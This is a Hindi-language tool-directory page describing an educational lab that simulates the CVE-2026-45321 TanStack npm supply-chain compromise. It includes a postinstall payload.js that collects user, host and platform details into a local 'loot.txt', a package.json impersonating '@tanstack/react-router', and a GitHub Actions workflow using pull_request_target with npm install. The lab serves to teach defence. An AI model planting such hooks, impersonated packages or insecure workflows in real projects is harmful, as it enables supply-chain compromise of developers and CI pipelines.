Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/7whyex/cve-2026-45321-tanstack
भेद्यता विश्लेषणमालवेयर विश्लेषणआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHub7whyex/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

शैक्षिक लैब जो npm सप्लाई चेन हमलों, CI/CD दुरुपयोग, और CVE-2026-45321 के माध्यम से इंस्टॉल-टाइम कोड निष्पादन का अनुकरण करती है। स्थानीय दुर्भावनापूर्ण पैकेज तैनाती के साथ व्यावहारिक रक्षात्मक सुरक्षा प्रशिक्षण।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सप्लाई चेन अटैक सिमुलेशन — CVE-2026-45321 (TanStack)

npm सप्लाई चेन अटैक, CI/CD दुरुपयोग और इंस्टॉल-टाइम कोड निष्पादन को समझने के लिए शैक्षिक प्रयोगशाला

अस्वीकरण

यह परियोजना केवल निम्नलिखित उद्देश्यों के लिए बनाई गई है:

  • साइबर सुरक्षा सीखना,
  • रक्षात्मक सुरक्षा अनुसंधान,
  • स्थानीय प्रयोगशाला सिमुलेशन,
  • सप्लाई चेन अटैक की अवधारणा को समझना।

इस परियोजना का उपयोग इसके लिए न करें:

  • वास्तविक सिस्टम पर हमला करना,
  • क्रेडेंशियल चुराना,
  • मैलवेयर तैनात करना,
  • अनधिकृत पहुँच,
  • या कोई अन्य अवैध गतिविधि।

विवरण

यह प्रयोगशाला निम्नलिखित घटनाओं की मूल अवधारणा का अनुकरण करती है:

  • CVE-2026-45321
  • TanStack npm सप्लाई चेन समझौता
  • GitHub Actions CI/CD दुरुपयोग
  • npm जीवनचक्र स्क्रिप्ट निष्पादन

सिमुलेशन स्थानीय और सुरक्षित रूप से बिना किसी वास्तविकता के किया जाता है:

  • वास्तविक क्रेडेंशियल चोरी,
  • टोकन एक्सफ़िलट्रेशन,
  • या तृतीय-पक्ष सेवाओं से समझौता।

प्रयोगशाला संरचना

root@kitploit:~
lab/
├── fake-repo/          # लक्ष्य रिपॉजिटरी का अनुकरण
├── attacker-package/   # दुर्भावनापूर्ण पैकेज का अनुकरण
└── victim-project/     # पीड़ित का अनुकरण

सिमुलेशन कार्यप्रणाली

root@kitploit:~
Attacker Package
        ↓
npm install
        ↓
postinstall स्क्रिप्ट चलती है
        ↓
payload.js स्वचालित रूप से निष्पादित होता है
        ↓
पीड़ित install-time निष्पादन से प्रभावित होता है

सीखी गई अवधारणाएँ

  • npm जीवनचक्र हुक्स
  • install-time मनमाना कोड निष्पादन
  • सप्लाई चेन अटैक
  • CI/CD विश्वास सीमा
  • दुर्भावनापूर्ण npm पैकेज
  • postinstall दुरुपयोग
  • निर्भरता समझौता

स्थापना

1. रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

अटैकर पैकेज सेटअप

2. अटैकर पैकेज फ़ोल्डर में जाएं

root@kitploit:~
cd attacker-package

3. निर्भरता स्थापित करें

root@kitploit:~
npm install

4. टारबॉल पैकेज बनाएं

root@kitploit:~
npm pack

परिणाम:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

पीड़ित सिमुलेशन

5. पीड़ित प्रोजेक्ट में जाएं

root@kitploit:~
cd ../victim-project

6. दुर्भावनापूर्ण पैकेज स्थापित करें

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

आउटपुट

यदि सफल होता है तो निम्न दिखाई देगा:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

और फ़ाइल:

root@kitploit:~
loot.txt

स्वचालित रूप से बन जाएगी।


उदाहरण payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

उदाहरण package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

CI/CD सिमुलेशन

इस परियोजना का उपयोग निम्नलिखित को समझने के लिए भी किया जा सकता है:

  • GitHub Actions
  • pull_request_target
  • CI/CD विशेषाधिकार सीमा
  • निर्भरता निष्पादन

उदाहरण वर्कफ़्लो:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

CVE-2026-45321 से संबंध

प्रयोगशाला सिमुलेशनवास्तविक दुनिया
attacker-packageसमझौता किया गया TanStack पैकेज
payload.jsदुर्भावनापूर्ण इंस्टॉलर

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

केवल शैक्षिक उद्देश्य

यह प्रयोगशाला निम्नलिखित के बारे में जागरूकता बढ़ाने के लिए बनाई गई है:

  • सप्लाई चेन सुरक्षा,
  • निर्भरता सुरक्षा,
  • CI/CD सुरक्षा,
  • और रक्षात्मक सुरक्षा अनुसंधान।
टूल डाउनलोड करें
postinstallजीवनचक्र हुक दुरुपयोग
victim-projectपीड़ित डेवलपर/CI
fake-repoGitHub Actions पाइपलाइन